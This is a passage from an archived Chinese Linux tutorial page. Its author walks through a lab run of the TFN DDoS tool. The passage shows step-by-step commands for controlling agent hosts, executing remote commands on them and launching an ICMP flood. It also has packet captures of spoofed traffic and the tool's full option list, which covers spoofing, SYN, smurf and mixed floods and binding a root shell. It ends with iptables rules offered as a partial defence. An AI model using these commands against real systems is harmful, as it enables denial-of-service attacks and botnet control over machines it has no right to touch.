📄 1641.html
字号:
<br>
6.攻击开始(悲惨的回忆上演中...)<br>
<br>
回到master(192.168.0.6 ),准备演练...<br>
<br>
<br>
[root@master root]#touch host.txt<br>
//建立代理记录文件(因为如果你足够无聊的话,有可能会建立很多的肉鸡-<br>
//代理,不记下会忘记的噢.) <br>
[root@master root]echo "192.168.0.2" > host.txt 将执行过td的ag1加入host.txt。<br>
[root@master root]echo "192.168.0.3" >> host.txt 添加ag2到host.txt .<br>
<br>
先来测试一下链接。<br>
<br>
[root@master root]./tfn -f host.txt -c 10 -i "mkdir wjpfjy" 与host.txt中的代理通讯,让其执行命令mkdir wjpfjy即建立一个目录<br>
<br>
<br>
Protocol : random<br>
Source IP : random<br>
Client input : list<br>
Command : execute remote command<br>
<br>
Password verification: <br>
//这里,会被提示输入密码,也就是编译时输入的密码,如果错了,将无法与td进程通讯<br>
<br>
Sending out packets: ..<br>
<br>
到ag1和ag2看看有没有建立目录名wjpfjy,一般情况下,会存在于td的同一目录,如果不确定,可以用find / -name wjpfjy -print来查找 <br>
<br>
[root@master root]./tfn -f host.txt -c 6 -i 192.168.0.5 开始ICMP/PING 攻击aim...(可怜我的P4啊,不到5分钟,就跟386一样慢),不过它在game over前,还是很艰辛的记录下了攻击数据,也算是对得住的那NK大洋啦.这是tcpdump的抓包记录.<br>
<br>
<br>
[root@aim root]# tcpdump -r pack.atta -c 4 -xX<br>
08:03:36.524907 23.43.171.0 > 192.168.0.5 icmp: echo request [ttl 0]<br>
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e........+..<br>
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply<br>
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E......@.Q.....<br>
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000 .+..............<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]<br>
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e......n$...<br>
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ................<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0050 0000 ..<br>
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply<br>
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U...@.......<br>
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $...............<br>
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ................<br>
<br>
<br>
<br>
[root@master root]./tfn -f host.txt -c 0 停止攻击<br>
<br>
<br>
Protocol : random<br>
Source IP : random<br>
Client input : list<br>
Command : stop flooding<br>
<br>
Password verification:<br>
<br>
Sending out packets: ...<br>
<br>
当然还有别的攻击方法,你只要用-c X就可以更改攻击方法.<br>
<br>
<br>
[root@master root]./tfn <br>
usage: ./tfn <br>
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.<br>
Uses a random protocol as default<br>
[-D n] Send out n bogus requests for each real one to decoy targets<br>
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need<br>
to use your real IP if you are behind spoof-filtering routers<br>
[-f hostlist] Filename containing a list of hosts with TFN servers to contact<br>
[-h hostname] To contact only a single host running a TFN server<br>
[-i target string] Contains options/targets separated by '@', see below<br>
[-p port] A TCP destination port can be specified for SYN floods<br>
<-c command ID> 0 - Halt all current floods on server(s) immediately<br>
1 - Change IP antispoof-level (evade rfc2267 filtering)<br>
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)<br>
2 - Change Packet size, usage: -i <br>
3 - Bind root shell to a port, usage: -i <br>
4 - UDP flood, usage: -i victim@victim2@victim3@...<br>
5 - TCP/SYN flood, usage: -i victim@... [-p destination port]<br>
6 - ICMP/PING flood, usage: -i victim@...<br>
7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...<br>
8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...<br>
9 - TARGA3 flood (IP stack penetration), usage: -i victim@...<br>
10 - Blindly execute remote shell command, usage -i command<br>
<br>
四.防守办法<br>
<br>
就如同网上所有介绍DDOS的文章一样,DDOS防不胜防,我试着用防火墙过滤掉所有icmp包,来保护我的主机,但所实现的,只是我的主机晚点儿崩溃而已.哎~,别指望我来防DDOS,要能防,我也不用不睡觉啊:(<br>
<br>
还是那句老话,我们能做的,就是尽量让我们的主机不成为别人攻击的代理,并对intranet 内出行的包进行严格限制,尽量不去危害别人,只要大家都这样做,我们的网络环境才可以安全一些,至少,我可以安心睡几天觉.<br>
<br>
附上我防火墙的一部分.主要是针对ICMP/PING的,不过用处不太大:(<br>
<br>
<br>
/sbin/iptables -P INPUT DROP<br>
/sbin/iptables -A INPUT -i lo -p all -j ACCEPT<br>
/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT<br>
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP<br>
/sbin/iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT<br>
/sbin/iptables -A INPUT -s 127.0.0.2 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -s 10.0.0.0/8 -i eth0 -j DROP<br>
/sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec <br>
--limit-burst 5 -j ACCEPT/sbin/iptables -A INPUT <br>
-i eth0 -p udp -m state --state NEW -j REJECT<br>
/sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT<br>
/sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth0 -m state <br>
--state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT<br>
/sbin/iptables -A INPUT -p udp -i eth0 -m state <br>
--state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT<br>
/sbin/iptables -A INPUT -p icmp --icmp-type echo-request <br>
-j LOG --log-level 2<br>
/sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type <br>
echo-request -j DROP<br>
/sbin/iptables -A INPUT -p tcp -m multiport <br>
--destination-port 135,137,138,139 -j LOG<br>
/sbin/iptables -A INPUT -p udp -m multiport <br>
--destination-port 135,137,138,139 -j LOG<br>
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT<br>
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT<br>
/sbin/iptables -A INPUT -p tcp -i eth1 -m state --state <br>
ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT<br>
<br>
以上只是我个人的一些摸索经验,不足或错误之处,还望指证。如果您可以防止DDOS,也请告诉我:)因为本文内容的特殊性,转载请通知我,谢谢合作:)<br>
<br>
并对帮助过我制定防火墙的sevenJ表示感谢!<br>
<br>
wjpfjy<br>
mail:wjpfjy@sohu.com<br>
QQ: 928395<br>
</FONT><br>
</TD>
</TR>
<TR>
<TD colSpan=2><FONT
class=middlefont></FONT><BR>
<FONT
class=normalfont>全文结束</FONT> </TD>
</TR>
<TR>
<TD background="images/dot.gif" tppabs="http://www.linuxhero.com/docs/images/dot.gif" colSpan=2
height=10></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></TD>
<TD vAlign=top width="20%"
background="images/line.gif" tppabs="http://www.linuxhero.com/docs/images/line.gif" rowSpan=2>
<DIV align=center>
<table class=tableoutline cellspacing=1 cellpadding=4
width="100%" align=center border=0>
<tr class=firstalt>
<td noWrap background="images/bgline.gif" tppabs="http://www.linuxhero.com/docs/images/bgline.gif" colspan=2 height=21>
<font class=normalfont><b>所有分类</b></font></td>
</tr>
<tr class=secondalt> <td noWrap width=27%> <font class=normalfont>1:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type1.html" tppabs="http://www.linuxhero.com/docs/type1.html">非技术类</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>2:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type2.html" tppabs="http://www.linuxhero.com/docs/type2.html">基础知识</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>3:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type3.html" tppabs="http://www.linuxhero.com/docs/type3.html">指令大全</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>4:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type4.html" tppabs="http://www.linuxhero.com/docs/type4.html">shell</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>5:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type5.html" tppabs="http://www.linuxhero.com/docs/type5.html">安装启动</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>6:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type6.html" tppabs="http://www.linuxhero.com/docs/type6.html">xwindow</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>7:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type7.html" tppabs="http://www.linuxhero.com/docs/type7.html">kde</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>8:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type8.html" tppabs="http://www.linuxhero.com/docs/type8.html">gnome</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>9:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type9.html" tppabs="http://www.linuxhero.com/docs/type9.html">输入法类</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>10:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type10.html" tppabs="http://www.linuxhero.com/docs/type10.html">美化汉化</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>11:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type11.html" tppabs="http://www.linuxhero.com/docs/type11.html">网络配置</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>12:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type12.html" tppabs="http://www.linuxhero.com/docs/type12.html">存储备份</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>13:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type13.html" tppabs="http://www.linuxhero.com/docs/type13.html">杂项工具</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>14:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type14.html" tppabs="http://www.linuxhero.com/docs/type14.html">编程技术</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>15:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type15.html" tppabs="http://www.linuxhero.com/docs/type15.html">网络安全</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>16:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type16.html" tppabs="http://www.linuxhero.com/docs/type16.html">内核技术</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>17:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type17.html" tppabs="http://www.linuxhero.com/docs/type17.html">速度优化</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>18:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type18.html" tppabs="http://www.linuxhero.com/docs/type18.html">apache</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>19:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type19.html" tppabs="http://www.linuxhero.com/docs/type19.html">email</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>20:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type20.html" tppabs="http://www.linuxhero.com/docs/type20.html">ftp服务</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>21:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type21.html" tppabs="http://www.linuxhero.com/docs/type21.html">cvs服务</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>22:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type22.html" tppabs="http://www.linuxhero.com/docs/type22.html">代理服务</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>23:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type23.html" tppabs="http://www.linuxhero.com/docs/type23.html">samba</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>24:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type24.html" tppabs="http://www.linuxhero.com/docs/type24.html">域名服务</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>25:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type25.html" tppabs="http://www.linuxhero.com/docs/type25.html">网络过滤</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>26:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type26.html" tppabs="http://www.linuxhero.com/docs/type26.html">其他服务</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>27:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type27.html" tppabs="http://www.linuxhero.com/docs/type27.html">nfs</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>28:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type28.html" tppabs="http://www.linuxhero.com/docs/type28.html">oracle</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>29:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type29.html" tppabs="http://www.linuxhero.com/docs/type29.html">dhcp</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>30:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type30.html" tppabs="http://www.linuxhero.com/docs/type30.html">mysql</a></font></td> </tr> </table></td></tr><tr class=secondalt> <td noWrap width=27%> <font class=normalfont>31:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type31.html" tppabs="http://www.linuxhero.com/docs/type31.html">php</a></font></td> </tr> </table></td></tr><tr class=firstalt> <td noWrap width=27%> <font class=normalfont>32:</font> </td><td noWrap width=73%> <table width=100% border=0> <tr> <td><font class=normalfont><a href="type32.html" tppabs="http://www.linuxhero.com/docs/type32.html">ldap</a></font></td> </tr> </table></td></tr> </table>
</DIV></TD></TR>
<TR vAlign=top>
<TD width="80%">
<DIV align=center><BR>
</DIV>
</TD></TR></TBODY></TABLE></TD></TR>
</TABLE></TD></TR>
</TABLE>
<TABLE cellSpacing=0 cellPadding=4 width="100%" bgColor=#eeeeee
border=0><TBODY>
<TR>
<TD width="50%">
<P><FONT class=middlefont>版权所有 © 2004 <A
href="mailto:bjchenxu@sina.com">linux知识宝库</A><BR>
违者必究. </FONT></P>
</TD>
<TD width="50%">
<DIV align=right><FONT class=middlefont>Powered by: <A
href="mailto:bjchenxu@sina.com">Linux知识宝库</A> Version 0.9.0 </FONT></DIV>
</TD></TR></TBODY></TABLE>
<CENTER></CENTER></TD></TR>
</TABLE></CENTER></BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -